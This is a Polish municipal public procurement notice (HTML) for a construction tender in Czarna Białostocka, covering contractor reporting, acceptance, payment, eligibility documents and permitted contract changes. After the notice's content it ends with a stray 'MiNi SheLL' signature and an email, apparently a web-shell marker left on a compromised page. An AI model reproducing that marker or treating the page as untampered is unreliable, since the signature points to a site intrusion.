b)	aktualny opis wykonanego zakresu robót przez Wykonawcę, ze wskazaniem procentowego zaawansowania rzeczowego i finansowego robót w odniesieniu do całości robót z uwzględnieniem podziału na elementy robót według harmonogramu rzeczowo-finansowego - w okresie sprawozdawczym i narastająco od początku realizacji inwestycji,
c)	opis robót realizowanych w okresie sprawozdawczym i planowanych w następnym miesiącu z uwzględnieniem podziału na elementy robót i poszczególne branże,
d)	informację na temat napotkanych problemów i podjętych działań naprawczych,
e)	opis zgodności postępu robót z harmonogramem (porównanie postępu robót w okresie sprawozdawczym z harmonogramem; wykazanie opóźnień i niezgodności przy realizacji umowy oraz wpływu na końcowy termin realizacji umowy; określenie środków i działań naprawczych),
f)	oświadczenia podwykonawców potwierdzające dokonanie zapłaty przez Wykonawcę bieżących należności za roboty objęte raportem miesięcznym
3)	odbiory robót:
a)	w terminie 2-ch tygodni przed końcem etapu robót Wykonawca zawiadomi Zamawiającego o zakończeniu etapu robót wynikającego z harmonogramu, który przystąpi do odbioru częściowego zgłoszonego etapu robót;
b)	odbiory robót zanikających i ulegających zakryciu, dokonywane będą przez Inspektora nadzoru inwestorskiego;
c)	Wykonawca winien zgłaszać gotowość do odbiorów, o których mowa wyżej, wpisem do Dziennika budowy;
d)	Wykonawca zgłosi Zamawiającemu gotowość do odbioru końcowego, pisemnie bezpośrednio w siedzibie Zamawiającego;
4)	zapłata wynagrodzenia za wykonane i potwierdzone przez Inspektora nadzoru prace, odebrane bez wad i zastrzeżeń przez Zamawiającego:
a)	realizowana będzie w okresach kwartalnych - na podstawie harmonogramu rzeczowo-finansowego robót oraz na podstawie protokołu odbioru poszczególnych części robót lub protokołu odbioru końcowego, stwierdzającego ilość i zakres rzeczowy wykonanych robót, złożonych oświadczeń podpisanych przez podwykonawców, którzy realizowali roboty podlegające odbiorowi o uregulowaniu ich należności za odpowiednią część prac i faktury wystawionej przez Wykonawcę;
b)	Wykonawca uprawniony jest do wystawienia faktury VAT po dokonaniu przez Zamawiającego odbioru części robót bez jakichkolwiek wad i zastrzeżeń oraz po zaakceptowaniu przez Inspektora nadzoru Raportu za kwartał rozliczeniowy, w którym wykonano zafakturowane roboty;
c)	rozliczenia częściowe realizowane będą do wysokości 60 % wynagrodzenia przedmiotu umowy; po osiągnięciu tej wartości następną płatnością jest rozliczenie końcowe dokonywane na podstawie protokołu odbioru końcowego podpisanego przez Zamawiającego bez wad i zastrzeżeń;
d)	wynagrodzenie przysługujące Wykonawcy będzie płatne przelewem na jego rachunek bankowy wskazany w treści faktury VAT w terminie 30 dni od daty dostarczenia Zamawiającemu faktury wraz z dokumentami rozliczeniowymi, pod warunkiem wystawienia faktury zgodnie z postanowieniami niniejszej umowy;
e)	do każdej faktury (rachunku) Wykonawca jest zobowiązany dołączyć oświadczenie podwykonawców o niezaleganiu Wykonawcy z zapłatą należnego im wynagrodzenia;
f)	Wykonawca wystawi odrębne faktury (rachunki) dla robót wymienionych jako objęte odrębną kalkulacją cenową.
5)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy;
6)	określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.
3.	Wymagania dot. gwarancji jakości wykonania przedmiotu zamówienia:
Wykonawca udzieli Zamawiającemu gwarancji jakości wykonania przedmiotu umowy na okres 36 miesięcy od daty podpisania przez zamawiającego i wykonawcę protokołu końcowego.
4.	Wykonawca w trakcie realizacji zamówienia może składać wnioski i propozycje zmiany sposobu wykonania zamówienia, które przyspieszą ukończenie robót.
5.	Zamawiający dopuszcza wprowadzenie zmian technicznych i technologicznych w urządzeniach, materiałach, w szczególności gdy wystąpi co najmniej jedna z poniższych okoliczności:
1)	konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
2)	zmiany w wymaganiach parametrycznych urządzeń w związku z pojawiającymi się rozwojowymi zmianami techniczno-technologicznymi,
3)	zmiany spowodują racjonalniejsze wykonanie przedmiotu zamówienia.
6.	Zamawiający dopuszczając wprowadzenie zmian sposobu wykonania zamówienia, zmian technicznych i technologicznych w urządzeniach, materiałach nie dopuszcza możliwości zmian w dokumentacji projektowej skutkujących koniecznością uzyskania pozwolenia na budowę oraz wysokości wynagrodzenia.
7.	Wymagania stawiane Wykonawcy:
1)	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia,
2)	pokrycie wszystkich kosztów podłączenia i zaopatrzenia w media (w tym energię elektryczną)  niezbędnych do wykonania przedmiotu zamówienia; 
3)	uzyskanie wszystkich niezbędnych wymaganych prawem uzgodnień, postanowień oraz decyzji wraz z poniesieniem wszystkich opłat z tym związanych;
4)	konieczność wykonania badań i odbiorów technicznych poszczególnych elementów realizowanej inwestycji oraz poniesienia wszelkich kosztów z tym związanych leży po stronie Wykonawcy;
5)	wymagana jest należyta staranność przy realizacji zobowiązań umowy;
6)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy;
7)	określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia;
8)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia;
9)	Wykonawca jest odpowiedzialny za zgodność wykonywanych robót z warunkami technicznymi i jakościowymi właściwymi dla przedmiotu zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>w przypadku zaistnienia konieczności wykonania robót rozbiórkowych lub zmiany przebiegu sieci (urządzeń) z uwagi na kolizję z podziemnymi sieciami (urządzeniami, budowlami) infrastruktury technicznej ujawnionymi w trakcie wykonywania robót nie wykazanymi na mapach ewidencyjnych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.30-8, 45.23.24.23-3, 45.23.21.30-2, 45.23.31.20-6, 45.23.32.22-1, 45.22.33.00-9, 45.31.12.00-2, 45.31.61.10-9, 35.12.00.00-1, 32.33.31.00-7, 32.33.32.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości 100.000,00 zł (słownie: sto tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	realizacji co najmniej 2 robót budowlanych polegających na wykonaniu sieci wodociągowej lub kanalizacyjnej o wartości zamówienia min. 1.000.000,00 zł brutto w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
b)	realizacji co najmniej 2 robót budowlanych polegających na wykonaniu drogi o nawierzchni bitumicznej wraz z chodnikami o wartości zamówienia min. 2.000.000,00 zł brutto w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę dysponowaniem:
a)	kierownikiem robót posiadającym uprawnienia do kierowania robotami branży sanitarnej;
b)	kierownikiem robót posiadającym uprawnienia do kierowania robotami branży drogowej;
c)	kierownikiem robót posiadającym uprawnienia do kierowania robotami branży elektrycznej;
d)	kierownikiem budowy odpowiedzialnym za realizację całości przedmiotu zamówienia (może być jedna z osób wymienionych powyżej)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	wymagane jest wykazanie przez Wykonawcę opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o sumie ubezpieczenia odpowiedzialności cywilnej w wysokości  min. 2.000.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	dowód wniesienia wadium;
2)	formularz ofertowy - wypełniony i podpisany przez Wykonawcę z wykorzystaniem wzoru stanowiącego załącznik do specyfikacji;
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych z wykorzystaniem wzoru stanowiącego załącznik do specyfikacji;
4)	harmonogram rzeczowo-finansowy z wykorzystaniem wzoru stanowiącego załącznik do specyfikacji;
5)	zestawienie cen materiałów;
6)	zestawienie cen pracy sprzętu;
7)	zestawienie kosztów robocizny;
8)	pełnomocnictwo lub umocowanie prawne upoważnionego przedstawiciela Wykonawcy jeżeli taki został ustanowiony;
9)	jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, należy dołączyć:
a)	pisemne zobowiązania tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
b)	oświadczenie o braku podstaw do wykluczenia, z wykorzystaniem wzoru stanowiącego załącznik do specyfikacji</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Postanowienia umowy zawarto we wzorze umowy, który stanowi załącznik do specyfikacji.
2.	Zamawiający dopuszcza możliwość dokonania zmian w zakresie terminu realizacji przedmiotu umowy w przypadku:
1)	wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,
2)	nie przekazania Wykonawcy przez Zamawiającego w terminie terenu budowy lub dokumentów budowy, do których przekazania Zamawiający był zobowiązany,
3)	wstrzymania przez Zamawiającego wykonania robót nie wynikających z okoliczności leżących po stronie Wykonawcy (nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru zamawiającego w przypadku stwierdzenia nieprawidłowości zawinionych przez wykonawcę),
4)	konieczności wykonania przez Zamawiającego korekty projektu dla usunięcia wad dostarczonej dokumentacji.
3.	W przypadku zmiany terminu realizacji przedmiotu umowy, o którym mowa w ust. 2, termin ten może ulec przedłużeniu nie dłużej jednak, niż o czas trwania tych okoliczności.
4.	Zamawiający dopuszcza możliwość dokonania zmian w zakresie skrócenia terminu realizacji zamówienia w przypadku stwierdzenia przez Wykonawcę możliwości wcześniejszego wykonania przedmiotu umowy.
5.	Zamawiający nie ma obowiązku przedłużenia terminu wykonania robót, jeżeli Wykonawca w terminie 7 dni  od wystąpienia okoliczności, o których mowa w ust. 1, nie złoży zamawiającemu, na piśmie, uzasadnionego wniosku o przedłużenie terminu wykonania przedmiotu umowy i  nie uzyska  akceptacji tego wniosku.
6.	Zamawiający dopuszcza możliwość zmian w umowie polegających na rozszerzeniu odpowiedzialności z tytułu rękojmi lub przedłużeniu terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez wykonawcę.
7.	Zamawiający dopuszcza możliwość zmiany wysokości wynagrodzenia jedynie w następujących przypadkach:
1)	rezygnacji Zamawiającego z realizacji części robót, w sytuacjach niedających się przewidzieć w dacie zawarcia umowy, przy czym zmiana wynagrodzenia ustalona zostanie na podstawie zestawienia cen materiałów i pracy sprzętu oraz kosztów robocizny przedstawionych przez Wykonawcę w ofercie.
2)	zmiany stawki podatku VAT wynikającej z obowiązujących przepisów prawa, przy czym w takim przypadku zmianie ulegnie część wynagrodzenia niezafakturowana do dnia zmiany przepisów,
3)	zmiany materiałów koniecznych do wykonywania robót, jakości i innych cech charakterystycznych któregokolwiek elementu robót pod warunkiem,  że zmiana ta będzie korzystna dla  Zamawiającego, 
4)	zmiany warunków geologicznych,  archeologicznymi  lub terenowych  odmiennych   od przyjętych w dokumentacji projektowej, 
5)	wprowadzenia zmian w stosunku do dokumentacji projektowej na wykonanie robót zamiennych  nie  wykraczających poza zakres przedmiotu zamówienia wraz z możliwością zmiany wynagrodzenia brutto za przedmiot umowy, w sytuacji konieczności zwiększenia  bezpieczeństwa realizacji  robót budowlanych, usprawnienia procesu budowy bądź usunięcia wad ukrytych  dokumentacji projektowej i uzyskania założonego efektu użytkowego oraz zmiany obowiązujących  przepisów prawa.
8.	W przypadku  okoliczności, o których mowa w  ust. 7 powyżej, Wykonawca zobowiązany jest przedłożyć do akceptacji Zamawiającego kalkulację ceny jednostkowej  robót  z uwzględnieniem cen nie wyższych od średnich cen publikowanych w wydawnictwie Sekocenbud w miesiącu w którym kalkulacja jest sporządzana oraz nakładów rzeczowych określonych w Katalogach Nakładów Rzeczowych (KNR), a w przypadku robót dla których nie określono nakładów rzeczowych w KNR, wg innych ogólnie stosowanych katalogów lub nakładów własnych zaakceptowanych przez Zamawiającego.
9.	Warunkiem  dokonania zmiany, o której mowa w ust. 7, jest złożenie uzasadnionego wniosku przez stronę  inicjującą zmianę lub sporządzenie  przez strony  stosownego protokołu konieczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.czarnabialostocka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Czarnej Białostockiej, 16-020 Czarna Białostocka, ul. Traugutta 2, pok. nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2012 godzina 11:00, miejsce: Urząd Miejski w Czarnej Białostockiej, 16-020 Czarna Białostocka, ul. Traugutta 2, pok. nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja jest współfinansowana ze środków Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013 Osi priorytetowej I Nowoczesna Gospodarka Działanie I.3 Wspieranie innowacji, projekt pn. Budowa i uruchomienie Podlaskiego Parku Przemysłowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com